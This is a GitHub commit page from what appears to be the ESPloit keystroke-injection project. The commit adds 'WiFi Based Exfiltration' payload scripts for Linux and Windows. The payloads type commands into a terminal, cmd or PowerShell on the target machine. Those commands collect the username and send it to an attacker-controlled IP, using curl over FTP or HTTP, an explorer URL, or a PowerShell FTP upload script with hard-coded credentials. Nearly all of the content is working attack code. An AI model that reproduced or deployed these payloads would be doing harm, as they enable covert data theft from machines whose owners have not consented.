-
Notifications
You must be signed in to change notification settings - Fork 136
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Introduce WiFi Based Exfiltration Methods!!!
- Loading branch information
1 parent
15f9352
commit d153cd4
Showing
10 changed files
with
168 additions
and
4 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
Rem: Exfiltrate UserName from Linux Box | ||
Rem: ESPloit and Target must be connected to the same network for this to work | ||
Rem: Set the IP/User/Pass of ESPloit below by modifying "export xip='192.168.1.169'", "ftpuser='ftp-admin'", and "ftppass='hacktheplanet'" | ||
Press:134+195 | ||
PrintLine:gnome-terminal | ||
PrintLine:export xfile='LinuxUser.txt'; export ftpuser='ftp-admin'; export ftppass='hacktheplanet'; data="$(whoami)"; echo ${data}>${xfile}; export xip='192.168.1.169' | ||
Rem: Wait for FTP server to be ready | ||
CustomDelay:5000 | ||
PrintLine:curl -T ${xfile} ftp://${ftpuser}:${ftppass}@${xip}/${xfile} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
Rem: Exfiltrate UserName from Linux Box | ||
Rem: ESPloit and Target must be connected to the same network for this to work | ||
Rem: Set the IP of ESPloit below by modifying "export xip='192.168.1.169'" | ||
Press:134+195 | ||
PrintLine:gnome-terminal | ||
PrintLine:data="$(whoami)"; export xip='192.168.1.169'; export xfile='LinuxUser.txt'; curl "http://${xip}/exfiltrate?file=${xfile}&data=${data}"; exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
Rem: Exfiltrate UserName from Windows Box | ||
Rem: ESPloit and Target must be connected to the same network for this to work | ||
Rem: Set the IP of ESPloit below by changing "SET ip=192.168.1.169" | ||
Press:131+114 | ||
PrintLine:cmd | ||
PrintLine:whoami>tmp& SET /P data=<tmp& del tmp& SET file=WinUser.txt& SET ip=192.168.1.169 | ||
PrintLine:SET url=^"http:///%ip%/exfiltrate^?file^=%file%^&data^=%data%^" | ||
PrintLine:explorer %url%&exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
Rem:Based on example from https://stackoverflow.com/a/2485696/537243 | ||
Rem:Due to formatting the exfiltrated data may not show up properly when viewing it in "List Exfiltrated Data" | ||
Rem:To get around this issue simply click on "Download File" when on the "List Exfiltrated Data" page | ||
DefaultDelay:2000 | ||
Press:131+114 | ||
PrintLine:powershell | ||
CustomDelay:3000 | ||
PrintLine:whoami | Out-File data | ||
PrintLine:notepad ftp.ps1 | ||
CustomDelay:1000 | ||
Press:176 | ||
CustomDelay:1000 | ||
Rem:Modify the line below with your settings | ||
PrintLine: | ||
PrintLine:$ftpURI = "ftp://ftp-admin:[email protected]/data" | ||
PrintLine:$webclient = New-Object -TypeName System.Net.WebClient; | ||
PrintLine:$ftpURI = New-Object -TypeName System.Uri -ArgumentList $ftpURI; | ||
PrintLine:$webclient.UploadFile($ftpURI, [System.ENVIRONMENT]::CurrentDirectory + "\data"); | ||
PrintLine:Write-output "Uploaded file ... "; | ||
Press:130+197 | ||
CustomDelay:1000 | ||
PrintLine:s | ||
Press:176 | ||
CustomDelay:1000 | ||
PrintLine: | ||
CustomDelay:5000 | ||
PrintLine:.\ftp.ps1 |
Large diffs are not rendered by default.
Oops, something went wrong.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1,2 @@ | ||
String version = "2.3.7"; | ||
String version = "2.4.0"; | ||
String latestardversion = "2.1"; |